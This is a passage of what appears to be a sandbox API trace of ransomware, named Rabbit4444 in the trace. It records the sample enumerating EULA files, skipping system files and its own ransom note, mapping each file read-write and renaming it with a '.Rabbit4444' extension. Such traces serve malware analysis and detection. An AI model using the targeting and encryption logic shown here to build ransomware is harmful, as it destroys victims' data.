lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.289] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0047.289] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.289] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0047.289] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.289] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0047.289] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13860018229) returned 1 [0047.290] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0047.290] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0047.290] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.290] CloseHandle (hObject=0x298) returned 1 [0047.290] CloseHandle (hObject=0x278) returned 1 [0047.292] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_en-gb.htm.Rabbit4444") returned 63 [0047.292] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_en-gb.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_en-gb.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_en-gb.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_en-gb.htm.rabbit4444"), dwFlags=0x1) returned 1 [0047.293] InterlockedExchangeAdd (in: Addend=0xff618, Value=58560 | out: Addend=0xff618) returned 10381280 [0047.293] InterlockedExchangeAdd (in: Addend=0xff624, Value=7 | out: Addend=0xff624) returned 3063 [0047.293] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3d997f, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3d997f, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0xe4b5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_en-us.htm", cAlternateFileName="EULA_E~3.HTM")) returned 1 [0047.293] lstrcmpiW (lpString1="EULA_en-us.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.293] lstrcmpiW (lpString1="EULA_en-us.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.293] lstrcmpiW (lpString1="EULA_en-us.htm", lpString2="Rabbit4444.exe") returned -1 [0047.293] lstrcmpiW (lpString1="EULA_en-us.htm", lpString2=".") returned 1 [0047.293] lstrcmpiW (lpString1="EULA_en-us.htm", lpString2="..") returned 1 [0047.293] lstrcmpiW (lpString1="EULA_en-us.htm", lpString2="windows") returned -1 [0047.293] lstrcmpiW (lpString1="EULA_en-us.htm", lpString2="bootmgr") returned 1 [0047.293] lstrcmpiW (lpString1="EULA_en-us.htm", lpString2="pagefile.sys") returned -1 [0047.293] lstrcmpiW (lpString1="EULA_en-us.htm", lpString2="boot") returned 1 [0047.293] lstrcmpiW (lpString1="EULA_en-us.htm", lpString2="ids.txt") returned -1 [0047.293] lstrcmpiW (lpString1="EULA_en-us.htm", lpString2="NTUSER.DAT") returned -1 [0047.294] lstrcpyW (in: lpString1=0x130eb84, lpString2="EULA_en-us.htm" | out: lpString1="EULA_en-us.htm") returned="EULA_en-us.htm" [0047.294] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_en-us.htm", dwFileAttributes=0x0) returned 1 [0047.294] lstrlenW (lpString="EULA_en-us.htm") returned 14 [0047.294] lstrlenW (lpString="Rabbit4444") returned 10 [0047.294] lstrcmpiW (lpString1="_en-us.htm", lpString2="Rabbit4444") returned -1 [0047.295] lstrlenW (lpString=".dll") returned 4 [0047.295] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0047.295] lstrlenW (lpString=".lnk") returned 4 [0047.295] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0047.295] lstrlenW (lpString=".ini") returned 4 [0047.295] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0047.295] lstrlenW (lpString=".sys") returned 4 [0047.295] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0047.295] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_en-us.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_en-us.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.295] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.295] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13860571025) returned 1 [0047.295] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=58549) returned 1 [0047.295] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0047.295] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0047.295] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe7c0, lpName=0x0) returned 0x298 [0047.296] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe7c0) returned 0x70000 [0047.298] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.298] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0047.298] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.298] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0047.298] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.299] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0047.299] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.299] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0047.299] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13860955677) returned 1 [0047.299] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0047.299] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0047.299] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.300] CloseHandle (hObject=0x298) returned 1 [0047.300] CloseHandle (hObject=0x278) returned 1 [0047.302] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_en-us.htm.Rabbit4444") returned 63 [0047.302] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_en-us.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_en-us.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_en-us.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_en-us.htm.rabbit4444"), dwFlags=0x1) returned 1 [0047.302] InterlockedExchangeAdd (in: Addend=0xff618, Value=58560 | out: Addend=0xff618) returned 10439840 [0047.302] InterlockedExchangeAdd (in: Addend=0xff624, Value=3 | out: Addend=0xff624) returned 3070 [0047.302] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3dad37, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3dad37, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x110b8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_es-es.htm", cAlternateFileName="EULA_E~4.HTM")) returned 1 [0047.302] lstrcmpiW (lpString1="EULA_es-es.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.302] lstrcmpiW (lpString1="EULA_es-es.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.302] lstrcmpiW (lpString1="EULA_es-es.htm", lpString2="Rabbit4444.exe") returned -1 [0047.302] lstrcmpiW (lpString1="EULA_es-es.htm", lpString2=".") returned 1 [0047.302] lstrcmpiW (lpString1="EULA_es-es.htm", lpString2="..") returned 1 [0047.302] lstrcmpiW (lpString1="EULA_es-es.htm", lpString2="windows") returned -1 [0047.302] lstrcmpiW (lpString1="EULA_es-es.htm", lpString2="bootmgr") returned 1 [0047.302] lstrcmpiW (lpString1="EULA_es-es.htm", lpString2="pagefile.sys") returned -1 [0047.303] lstrcmpiW (lpString1="EULA_es-es.htm", lpString2="boot") returned 1 [0047.303] lstrcmpiW (lpString1="EULA_es-es.htm", lpString2="ids.txt") returned -1 [0047.303] lstrcmpiW (lpString1="EULA_es-es.htm", lpString2="NTUSER.DAT") returned -1 [0047.303] lstrcpyW (in: lpString1=0x130eb84, lpString2="EULA_es-es.htm" | out: lpString1="EULA_es-es.htm") returned="EULA_es-es.htm" [0047.303] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_es-es.htm", dwFileAttributes=0x0) returned 1 [0047.303] lstrlenW (lpString="EULA_es-es.htm") returned 14 [0047.303] lstrlenW (lpString="Rabbit4444") returned 10 [0047.303] lstrcmpiW (lpString1="_es-es.htm", lpString2="Rabbit4444") returned -1 [0047.303] lstrlenW (lpString=".dll") returned 4 [0047.303] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0047.303] lstrlenW (lpString=".lnk") returned 4 [0047.303] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0047.303] lstrlenW (lpString=".ini") returned 4 [0047.303] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0047.303] lstrlenW (lpString=".sys") returned 4 [0047.303] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0047.303] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_es-es.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_es-es.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.303] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.303] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13861415556) returned 1 [0047.303] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=69816) returned 1 [0047.304] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0047.304] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101e20 [0047.304] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x113c0, lpName=0x0) returned 0x298 [0047.305] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x113c0) returned 0x70000 [0047.308] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.308] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0047.308] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.308] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0047.308] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.308] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0047.308] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.309] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0047.309] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13861931099) returned 1 [0047.309] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0047.309] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0047.309] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.309] CloseHandle (hObject=0x298) returned 1 [0047.309] CloseHandle (hObject=0x278) returned 1 [0047.312] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_es-es.htm.Rabbit4444") returned 63 [0047.312] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_es-es.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_es-es.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_es-es.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_es-es.htm.rabbit4444"), dwFlags=0x1) returned 1 [0047.313] InterlockedExchangeAdd (in: Addend=0xff618, Value=69824 | out: Addend=0xff618) returned 10498400 [0047.313] InterlockedExchangeAdd (in: Addend=0xff624, Value=5 | out: Addend=0xff624) returned 3073 [0047.313] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3dc0bd, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3dc0bd, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x110b8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_es-mx.htm", cAlternateFileName="EU6344~1.HTM")) returned 1 [0047.313] lstrcmpiW (lpString1="EULA_es-mx.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.313] lstrcmpiW (lpString1="EULA_es-mx.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.313] lstrcmpiW (lpString1="EULA_es-mx.htm", lpString2="Rabbit4444.exe") returned -1 [0047.313] lstrcmpiW (lpString1="EULA_es-mx.htm", lpString2=".") returned 1 [0047.313] lstrcmpiW (lpString1="EULA_es-mx.htm", lpString2="..") returned 1 [0047.313] lstrcmpiW (lpString1="EULA_es-mx.htm", lpString2="windows") returned -1 [0047.313] lstrcmpiW (lpString1="EULA_es-mx.htm", lpString2="bootmgr") returned 1 [0047.313] lstrcmpiW (lpString1="EULA_es-mx.htm", lpString2="pagefile.sys") returned -1 [0047.313] lstrcmpiW (lpString1="EULA_es-mx.htm", lpString2="boot") returned 1 [0047.313] lstrcmpiW (lpString1="EULA_es-mx.htm", lpString2="ids.txt") returned -1 [0047.313] lstrcmpiW (lpString1="EULA_es-mx.htm", lpString2="NTUSER.DAT") returned -1 [0047.313] lstrcpyW (in: lpString1=0x130eb84, lpString2="EULA_es-mx.htm" | out: lpString1="EULA_es-mx.htm") returned="EULA_es-mx.htm" [0047.313] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_es-mx.htm", dwFileAttributes=0x0) returned 1 [0047.313] lstrlenW (lpString="EULA_es-mx.htm") returned 14 [0047.313] lstrlenW (lpString="Rabbit4444") returned 10 [0047.313] lstrcmpiW (lpString1="_es-mx.htm", lpString2="Rabbit4444") returned -1 [0047.313] lstrlenW (lpString=".dll") returned 4 [0047.313] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0047.313] lstrlenW (lpString=".lnk") returned 4 [0047.313] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0047.314] lstrlenW (lpString=".ini") returned 4 [0047.314] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0047.314] lstrlenW (lpString=".sys") returned 4 [0047.314] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0047.314] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_es-mx.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_es-mx.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.314] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.314] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13862453941) returned 1 [0047.314] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=69816) returned 1 [0047.314] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0047.314] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0047.314] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x113c0, lpName=0x0) returned 0x298 [0047.315] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x113c0) returned 0x70000 [0047.318] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.318] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0047.318] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.318] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0047.318] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.318] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0047.318] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.318] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0047.318] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13862911315) returned 1 [0047.318] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0047.318] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0047.319] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.319] CloseHandle (hObject=0x298) returned 1 [0047.319] CloseHandle (hObject=0x278) returned 1 [0047.322] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_es-mx.htm.Rabbit4444") returned 63 [0047.322] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_es-mx.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_es-mx.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_es-mx.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_es-mx.htm.rabbit4444"), dwFlags=0x1) returned 1 [0047.322] InterlockedExchangeAdd (in: Addend=0xff618, Value=69824 | out: Addend=0xff618) returned 10568224 [0047.322] InterlockedExchangeAdd (in: Addend=0xff624, Value=4 | out: Addend=0xff624) returned 3078 [0047.323] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3dd45a, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3dd45a, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0xf67d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_et-ee.htm", cAlternateFileName="EU56AC~1.HTM")) returned 1 [0047.323] lstrcmpiW (lpString1="EULA_et-ee.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.323] lstrcmpiW (lpString1="EULA_et-ee.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.323] lstrcmpiW (lpString1="EULA_et-ee.htm", lpString2="Rabbit4444.exe") returned -1 [0047.323] lstrcmpiW (lpString1="EULA_et-ee.htm", lpString2=".") returned 1 [0047.323] lstrcmpiW (lpString1="EULA_et-ee.htm", lpString2="..") returned 1 [0047.323] lstrcmpiW (lpString1="EULA_et-ee.htm", lpString2="windows") returned -1 [0047.323] lstrcmpiW (lpString1="EULA_et-ee.htm", lpString2="bootmgr") returned 1 [0047.323] lstrcmpiW (lpString1="EULA_et-ee.htm", lpString2="pagefile.sys") returned -1 [0047.323] lstrcmpiW (lpString1="EULA_et-ee.htm", lpString2="boot") returned 1 [0047.323] lstrcmpiW (lpString1="EULA_et-ee.htm", lpString2="ids.txt") returned -1 [0047.323] lstrcmpiW (lpString1="EULA_et-ee.htm", lpString2="NTUSER.DAT") returned -1 [0047.323] lstrcpyW (in: lpString1=0x130eb84, lpString2="EULA_et-ee.htm" | out: lpString1="EULA_et-ee.htm") returned="EULA_et-ee.htm" [0047.323] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_et-ee.htm", dwFileAttributes=0x0) returned 1 [0047.323] lstrlenW (lpString="EULA_et-ee.htm") returned 14 [0047.323] lstrlenW (lpString="Rabbit4444") returned 10 [0047.323] lstrcmpiW (lpString1="_et-ee.htm", lpString2="Rabbit4444") returned -1 [0047.323] lstrlenW (lpString=".dll") returned 4 [0047.323] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0047.323] lstrlenW (lpString=".lnk") returned 4 [0047.323] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0047.323] lstrlenW (lpString=".ini") returned 4 [0047.323] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0047.323] lstrlenW (lpString=".sys") returned 4 [0047.323] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0047.324] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_et-ee.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_et-ee.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.324] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.324] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13863443078) returned 1 [0047.324] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=63101) returned 1 [0047.324] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0047.324] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0047.324] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xf980, lpName=0x0) returned 0x298 [0047.325] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf980) returned 0x70000 [0047.328] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.328] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0047.328] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.328] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0047.328] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.328] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0047.328] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.328] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0047.328] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13863913364) returned 1 [0047.328] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0047.328] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0047.329] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.329] CloseHandle (hObject=0x298) returned 1 [0047.329] CloseHandle (hObject=0x278) returned 1 [0047.331] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_et-ee.htm.Rabbit4444") returned 63 [0047.331] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_et-ee.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_et-ee.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_et-ee.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_et-ee.htm.rabbit4444"), dwFlags=0x1) returned 1 [0047.332] InterlockedExchangeAdd (in: Addend=0xff618, Value=63104 | out: Addend=0xff618) returned 10638048 [0047.332] InterlockedExchangeAdd (in: Addend=0xff624, Value=4 | out: Addend=0xff624) returned 3082 [0047.332] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3dfb2b, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3dfb2b, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x1145a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_fi-fi.htm", cAlternateFileName="EULA_F~1.HTM")) returned 1 [0047.332] lstrcmpiW (lpString1="EULA_fi-fi.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.332] lstrcmpiW (lpString1="EULA_fi-fi.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.332] lstrcmpiW (lpString1="EULA_fi-fi.htm", lpString2="Rabbit4444.exe") returned -1 [0047.333] lstrcmpiW (lpString1="EULA_fi-fi.htm", lpString2=".") returned 1 [0047.333] lstrcmpiW (lpString1="EULA_fi-fi.htm", lpString2="..") returned 1 [0047.333] lstrcmpiW (lpString1="EULA_fi-fi.htm", lpString2="windows") returned -1 [0047.333] lstrcmpiW (lpString1="EULA_fi-fi.htm", lpString2="bootmgr") returned 1 [0047.333] lstrcmpiW 